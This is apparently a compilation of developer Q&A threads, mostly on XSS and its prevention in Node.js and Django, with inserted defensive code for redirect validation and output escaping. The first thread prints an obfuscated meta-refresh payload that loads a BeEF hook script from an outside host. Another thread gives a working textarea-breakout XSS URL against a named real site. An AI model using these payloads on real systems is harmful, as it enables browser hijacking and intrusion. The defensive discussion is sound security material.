XSS in meta tag - xss

Some professional pentester guy told me this XSS test vector is useless for pentesting. The payload looks like this:
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
but when I save the code to an HTML file with more powerful JavaScript like hook.js (from the BeEF exploit framework):
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%36%30%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%33%32%2C%31%31%35%2C%31%31%34%2C%39%39%2C%36%31%2C%31%30%34%2C%31%31%36%2C%31%31%36%2C%31%31%32%2C%35%38%2C%34%37%2C%34%37%2C%31%31%32%2C%31%30%38%2C%31%30%31%2C%39%38%2C%31%31%35%2C%34%36%2C%31%30%39%2C%31%30%31%2C%34%37%2C%34%38%2C%34%36%2C%31%30%36%2C%31%31%35%2C%36%32%2C%36%30%2C%34%37%2C%31%31%35%2C%39%39%2C%31%31%34%2C%31%30%35%2C%31%31%32%2C%31%31%36%2C%36%32%29%29%3C%2F%73%63%72%69%70%74%3E">
it works perfectly on Firefox and Chrome. I can see the victim online in my BeEF exploit framework and a lot of functions are available.
I don't really get it. What's wrong with this payload? I have asked him this question several times but there is no response from him. It makes me very confused. Can anybody tell me why he said this one is useless for pentesting?

XSS through a meta tag is highly dependent on the browser used by the target victim. A meta tag such as <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> will fire malicious JavaScript on the hosting domain, but will only work in Safari; all other browsers refuse to follow a location: javascript: header.
When using a data URI in the tag, the browser will load the decoded payload into a null domain and any JavaScript will be fired in the context of a null domain. While this can still be used to fire redirects, XHR and other such attacks, it is useless for accessing anything on the hosting domain. This attack will also not work in IE, since it only allows data URIs for image-type elements, and I think that is even restricted to style/CSS.
Though meta tag injections are only successful for XSS in a very limited capacity, they are still very dangerous in other attacks and are worth testing.

As far as I remember, data: URIs are loaded as a separate origin, so you cannot access the vulnerable site from the injected script. However, this could be used to deliver an exploit or for phishing, so I wouldn't call it totally useless.
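Both answers turn on where the browser is sent and which origin the result runs in. As an added defensive example, not from the question or any of the answers, here is a Node.js check a server can apply to any user-influenced redirect target before it is written into a meta refresh or a Location header: only http(s) URLs on an allow-list of hosts pass, and javascript: and data: targets are rejected. It also shows the origin the WHATWG URL parser assigns to a target, which is the string "null" for data: and javascript: URLs, the point both answers make. The host list, SITE_BASE, the function names and the sample inputs are all constructed for this example.

```javascript
// Added example (not from the original posts). Node.js, no dependencies:
// the WHATWG URL class is a global.

// Constructed allow-list of hosts a redirect may point to.
const ALLOWED_HOSTS = new Set(['example.com', 'www.example.com']);
// Constructed base used to resolve relative targets such as "/account".
const SITE_BASE = 'https://example.com/';

// Returns the normalised absolute URL if `raw` is a safe redirect target,
// otherwise null. Rejects anything that is not http(s), any host outside
// the allow-list, and userinfo tricks such as https://example.com@evil.test/.
function safeRedirectTarget(raw, allowedHosts = ALLOWED_HOSTS) {
  if (typeof raw !== 'string') return null;
  let u;
  try {
    u = new URL(raw, SITE_BASE);
  } catch {
    return null; // unparseable input is never a redirect target
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  if (u.username !== '' || u.password !== '') return null;
  if (!allowedHosts.has(u.hostname)) return null;
  return u.href;
}

// The origin a browser-compatible URL parser assigns to a target.
// data: and javascript: URLs get an opaque origin, serialised as "null",
// which is why script delivered that way cannot read the hosting site.
function originOf(raw) {
  try {
    return new URL(String(raw), SITE_BASE).origin;
  } catch {
    return null;
  }
}

// Emits the meta refresh tag only for a vetted target; the URL is also
// attribute-escaped so it cannot break out of the content attribute.
function metaRefresh(raw) {
  const target = safeRedirectTarget(raw);
  if (target === null) return '';
  const escaped = target
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
  return `<meta http-equiv="refresh" content="0; url=${escaped}">`;
}

// Constructed inputs: the two schemes from the question plus ordinary cases.
const SAMPLES = [
  'javascript:alert(1)',
  'data:text/html,%3Cscript%3Ealert(1)%3C/script%3E',
  '//evil.test/phish',
  'https://example.com@evil.test/',
  '/account?tab=security',
  'https://www.example.com/login',
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), '->', safeRedirectTarget(s), '| origin:', originOf(s));
}
```

The check is deliberately an allow-list on scheme and host rather than a block-list of bad prefixes; a scheme-relative target like //evil.test/ or a userinfo prefix would slip past a naive "starts with /" or "starts with https://example.com" test, and the parser-based check catches both.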

Related

XSS DOM vulnerable

I tested a site for vulnerabilities (folder /service-contact) and a possible DOM XSS issue came up (using Kali Linux, Vega and XSSER). However, I tried to manually test the URL with an 'alert' script to make sure it's vulnerable. I used
www.babyland.nl/service-contact/alert("test")
No alert box/pop-up was shown; only the HTML code showed up in the contact form box.
I am not sure I used the right code (I'm a rookie) or made the right interpretation. The server is Apache, using JavaScript/JS.
Can you help?
Thanks!
This is not vulnerable to XSS. Whatever you are writing in the URL is coming in the form section below (Vraag/opmerking), and the double quotes (") are escaped. If you try another payload like <script>alert(/xss/)</script>, that also won't work, because this is neither reflecting nor storing. You will see the output as text in Vraag/opmerking. Don't rely on online scanners; test manually. For DOM-based XSS, check sinks and sources and analyze them.
The tool is right. There is an XSS vulnerability on the site, but the proof of concept (PoC) code is wrong. The content of a <textarea> can only contain character data (see the <textarea> description on MDN). So your <script>alert("test")</script> is interpreted as text and not as HTML code. But you can close the <textarea> tag and insert the JavaScript code after that.
Here is the working PoC URL:
https://www.babyland.nl/service-contact/</textarea><script>alert("test")</script>
which is rendered as:
<textarea rows="" cols="" id="comment" name="comment"></textarea><script>alert("test")</script></textarea>
A little note on testing for XSS injection: Chrome/Chromium has an XSS protection, so this code doesn't exploit in this browser. For manual testing you can use Firefox or run Chrome with --disable-web-security (see this StackOverflow question and this for more information).

Why Facebook Likes number changed for the same URL?

I have migrated my website from Joomla to Ruby on Rails, but I've noticed that the number of likes has changed for the same URL!
It was about 780 on the old website, then it became 35 on the new one.
What possible reasons could there be?
The most likely reason would be that the URLs are not exactly the same. Most likely due to a query string at the end of the URL.
If you are positive that isn't it, check to see that the source for calling the Facebook like button is the same.
This is a long shot, but if it still isn't fixed, you might want to compare the metadata inside the head tag and look for differences there.
<link rel="canonical" href="http://my.website.com" />
would be one that comes to mind.

How can I implement Open Graph (http://ogp.me/) to use my custom tags in another website?

I've reviewed http://ogp.me/ but couldn't find a solution. What I want to do is:
define an xmlns like:
<html xmlns:fb="http://ogp.me/ns/fb#">
set up an id for that website like:
<meta property="fb:app_id" content="1234" />
and use those tags as a component in HTML like:
<myTag:video src="someurl"></myTag:video>
Could you give me any idea how I can implement such a methodology for my system?
OK, I found another solution to make dynamic components that are served from my application to external websites, like a comment plugin. Just use JS to get information and push your HTML inside that website. An xmlns definition is not a good idea; also, Facebook cancelled its FBML structure in favour of pure JavaScript & CSS via API communication. That's the valid way.

What are the pros and cons of serving CSS and JavaScript using the Django template system

Often, I encounter scenarios where I see it makes sense to use template tags in CSS and JavaScript files, such as the use of {{ STATIC_URL }} in CSS to access images. I understand the only way to achieve this is to have CSS and JavaScript files served by Django. I am interested in this approach. But before I commit, I want to hear you experts' experience with it. What are the pros and cons of this approach? Thanks.
Pros:
You can make a lot of per-request decisions about how things look and behave.
You can keep the number of different CSS/JS files to a minimum.
Cons:
Browsers tend to cache CSS and JS aggressively, so you'll need to use some aggressive anti-cache techniques. Of course, this means disabling caching for some/all static files.
Every CSS and JS request will consume another thread of your WSGI server. In a normal request/response cycle, each request generally takes up one thread; you're effectively tripling this, at least, so now your app that could handle 200 simultaneous requests now can only handle 66.
When your site makes it big, a CDN probably can't help you.
Alternatives:
Tweak the CSS via javascript, and set a javascript variable inside your page template to control the tweaks.
Use multiple CSS files and control their inclusion dynamically.
Generate static files as needed, but then cache them to disk and serve them via mod_xsendfile. This only works if you are serving static files from somewhere the django process can write to, such as on the same machine or a network mount.
Personally, I've been sticking with the Django team's advice to make CSS and JavaScript static files, served directly by the server instead of via Django. It hasn't been a problem and has simplified a lot of things. Generally, any time I think I need a dynamic CSS or JS file, there's a way to refactor so I don't.
For example:
the use of {{ STATIC_URL }} in CSS to access image
I'm not sure how variable your {{ STATIC_URL }} is, but I've found that using the <base> tag in my pages fixes a lot of things. I assume this is for background images? Could you update your question to give an example?
Another thing I've done is, if my JavaScript needs dynamic data, I'll put most of the code in a JavaScript library I serve as a static file and then put the minimum dynamic stuff in a <script> tag at the end of the page. Usually I'll put it all in an object (looking a lot like JSON) and then just pass that object to a function. Come to think of it, you could just take all the dynamic stuff, make a dictionary out of it in your view function, encode it into JSON, and pass it via context. Then your page template just looks something like:
<html><head>
...
<script src="{{ STATIC_URL }}/js/foo.js"></script>
...
</head><body>
...
<script>
foo_main({{ foo_params_json|safe }});
</script>
</body></html>
This makes it a lot easier to reuse this code.

Preventing XSS in Node.js / server side javascript

Any idea how one would go about preventing XSS attacks on a Node.js app? Any libs out there that handle removing JavaScript in hrefs, onclick attributes, etc. from POSTed data?
I don't want to have to write a regex for all that :)
Any suggestions?
I've created a module that bundles the Caja HTML Sanitizer:
npm install sanitizer
http://github.com/theSmaw/Caja-HTML-Sanitizer
https://www.npmjs.com/package/sanitizer
Any feedback appreciated.
One of the answers to Sanitize/Rewrite HTML on the Client Side suggests borrowing the whitelist-based HTML sanitizer in JS from Google Caja which, as far as I can tell from a quick scroll-through, implements an HTML SAX parser without relying on the browser's DOM.
Update: Also, keep in mind that the Caja sanitizer has apparently been given a full, professional security review while regexes are known for being very easy to typo in security-compromising ways.
Update 2017-09-24: There is also now DOMPurify. I haven't used it yet, but it looks like it meets or exceeds every point I look for:
Relies on functionality provided by the runtime environment wherever possible. (Important both for performance and to maximize security by relying on well-tested, mature implementations as much as possible.)
Relies on either a browser's DOM or jsdom for Node.JS.
Default configuration designed to strip as little as possible while still guaranteeing removal of javascript.
Supports HTML, MathML, and SVG
Falls back to Microsoft's proprietary, un-configurable toStaticHTML under IE8 and IE9.
Highly configurable, making it suitable for enforcing limitations on an input which can contain arbitrary HTML, such as a WYSIWYG or Markdown comment field. (In fact, it's the top of the pile here)
Supports the usual tag/attribute whitelisting/blacklisting and URL regex whitelisting
Has special options to sanitize further for certain common types of HTML template metacharacters.
They're serious about compatibility and reliability
Automated tests running on 16 different browsers as well as three different major versions of Node.JS.
To ensure developers and CI hosts are all on the same page, lock files are published.
All the usual techniques apply to Node.js output as well, which means:
Blacklists will not work.
You're not supposed to filter input in order to protect HTML output. It will not work or will work by needlessly malforming the data.
You're supposed to HTML-escape text in HTML output.
I'm not sure if Node.js comes with a built-in for this, but something like this should do the job:
function htmlEscape(text) {
return text.replace(/&/g, '&amp;').
replace(/</g, '&lt;'). // it's not necessary to escape >
replace(/"/g, '&quot;').
replace(/'/g, '&#39;');
}
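Added example, not from any of the answers on this page: the same output-encoding idea applied per context in plain Node.js. It carries the htmlEscape answer's function through with the full set of HTML entities and applies it to text, attribute and <textarea> contexts (the textarea case is exactly what the "XSS DOM vulnerable" answer above exploits by closing the element). It also adds the encoding that the Django answer's foo_main({{ foo_params_json|safe }}) pattern needs when JSON is placed inside an inline <script>: JSON.stringify alone is not enough, because the HTML parser ends the script element at the first </script it sees, before any JavaScript runs. Django's json_script template filter performs the same substitution. The renderPage template, the scriptTagCount check and the SAMPLE values are constructed for this example.

```javascript
// Added example (not from the original answers). Plain Node.js, no dependencies.

// HTML text, double-quoted attribute and <textarea> contexts: replace the five
// metacharacters with entities. '&' must go first so it is not double-encoded.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Inline <script> JSON context. The HTML tokenizer closes the script element
// at the first "</script" regardless of JavaScript string syntax, so <, > and &
// are written as JSON \u escapes; U+2028/U+2029 are escaped because they are
// line terminators in JavaScript source. The result is still valid JSON.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Constructed page template: the same untrusted string lands in four contexts,
// each with the encoding that context requires.
function renderPage(params) {
  return [
    '<!doctype html><html><head><title>' + escapeHtml(params.title) + '</title></head><body>',
    '<input name="q" value="' + escapeHtml(params.query) + '">',
    '<p>' + escapeHtml(params.query) + '</p>',
    '<textarea name="comment">' + escapeHtml(params.query) + '</textarea>',
    '<script>foo_main(' + jsonForScript(params) + ');</script>',
    '</body></html>',
  ].join('\n');
}

// Counts script start tags in rendered markup; a correctly encoded page has
// exactly the one the template itself emits, whatever the input contained.
function scriptTagCount(html) {
  return (html.match(/<script[\s>]/gi) || []).length;
}

// Constructed input that would break out of each context without encoding:
// an attribute/textarea close followed by a script element.
const SAMPLE = {
  title: 'Search',
  query: '"></textarea><script>alert(1)</script>',
};

console.log(renderPage(SAMPLE));
console.log('script start tags:', scriptTagCount(renderPage(SAMPLE)));
```

The point of the inline-script case is that the JSON stays parseable by JSON.parse on the client while containing no character sequence the HTML tokenizer treats as markup; the JS engine decodes \u003c back to < only after the element boundaries have already been decided.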
I recently discovered node-validator by chriso.
Example
get('/', function (req, res) {
//Sanitize user input
req.sanitize('textarea').xss(); // No longer supported
req.sanitize('foo').toBoolean();
});
XSS Function Deprecation
The XSS function is no longer available in this library.
https://github.com/chriso/validator.js#deprecations
You can also look at ESAPI. There is a javascript version of the library. It's pretty sturdy.
In newer versions of the validator module you can use the following script to prevent XSS attacks:
var validator = require('validator');
var escaped_string = validator.escape(someString);
Try out the npm module strip-js. It performs the following actions:
Sanitizes HTML
Removes script tags
Removes attributes such as "onclick", "onerror", etc. which contain JavaScript code
Removes "href" attributes which contain JavaScript code
https://www.npmjs.com/package/strip-js
Update 2021-04-16: xss is a module used to filter input from users to prevent XSS attacks.
Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist.
Visit https://www.npmjs.com/package/xss
Project Homepage: http://jsxss.com
You should try the npm library "insane".
https://github.com/bevacqua/insane
I tried it in production; it works well. The size is very small (around 3 kB gzipped).
Sanitizes HTML
Removes all attributes or tags that evaluate JS
You can allow attributes or tags that you don't want sanitized
The documentation is very easy to read and understand.